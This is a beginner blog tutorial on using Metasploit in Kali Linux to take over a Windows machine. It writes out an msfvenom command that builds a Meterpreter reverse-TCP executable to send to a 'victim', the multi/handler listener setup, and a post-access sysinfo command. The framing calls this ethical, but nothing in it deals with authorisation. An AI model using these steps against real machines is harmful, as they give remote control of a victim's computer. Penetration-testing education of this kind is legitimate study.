Learn windows hacking ethically using Kali Linux

INTRODUCTION

Hello hackers! In the last article, we have seen how to perform subdomain enumeration using Kali Linux on android device. In this article, we are going to see how hackers hack windows machine using Kali Linux. We are going to use a tool which is preinstalled in Kali Linux and it is known as Metasploit.

What is Metasploit?

A/Q to Wikipedia, “The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.”

In simple terms, it is a collection of tools that can be used to scan,exploit,escalate privilege etc on a system, network or website. By using this tool, we can easily create payload and listener for any platform like windows, android, mac etc. If you guys want to create your own windows hacking tool with python then don’t forget to read this article here

AnnonucementIf you want to learn how hackers hack millions of accounts on a website, Then check out this beginner friendly course which will teach you how to perform account takeovers in real world websites that will boost your bug bounty hunting skills from basics to advance level.

Using Metasploit for Windows Hacking:

In order to ethically perform windows hacking, we need to generate two files i.e Payload and a Listener.

Listener: This will be running in own machine. It will allow our computer to listen for incoming connection.

Payload: This is the program that we need to send to our victim. When victim executes this program, it will connect back to our machine through Listener.

CREATING PAYLOAD

  1. Fire up your Kali Linux machine and type the command below
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your_local_ip> LPORT=<any_port> -f exe -o payload.exe

Let us try to understand the command with more depth:

-p: Specify the payload flag

windows/x64/meterpreter/reverse_tcp: We are specifying that we will using windows x64 reverse tcp payload that should give us a meterpreter shell once executed. Meterpreter shellls allows us to get complete access of the victim’s machine

LHOST: This will be the ip address where the payload should connect once the victim executes the program

LPORT: This will be the port where the payload should connect once the victim executes the program

-f exe: We are specifying that the file generated should be windows executable since we are testing our payload on windows machine.

-o payload.exe: Finally, we are using -o flag to save our output file as “payload.exe

windows hacking 1

Now that our payload file is created, let’s start our listener.

START METASPLOIT LISTENER

To start metasploit’s listener, follow these steps

1. Type msfconsole
2. use exploit/multi/handler
3. set payload windows/x64/meterpreter/reverse_tcp
4. set lhost <your_ip_used_in_payload>
windows hacking 2

Now our listener has been started. Once the victim executes the payload file, we will see an output similar to the following screenshot:

Now, we have complete access of the victim’s machine. Let’s test s simple command. In the terminal, type

meterpreter > sysinfo

You will get the victim’s machine’s information

windows hacking 4

CONCLUSION

I hope you have understood how we can perform windows hacking legally. Please note that this method will not work if the victim’s machine have any kind of antivirus installed. If you guys have any doubts or issues, then please let me know in the comment section.

Join our telegram channel here and stay updated with our latest contents.

Subscribe to our YouTube channel for latest cybersecurity videos.

Are you a bug bounty hunter? Check out our Account Takeover Lab and practice your skills ethically:

Lab 1 Lab 2 Lab 3 Lab 4 Lab 5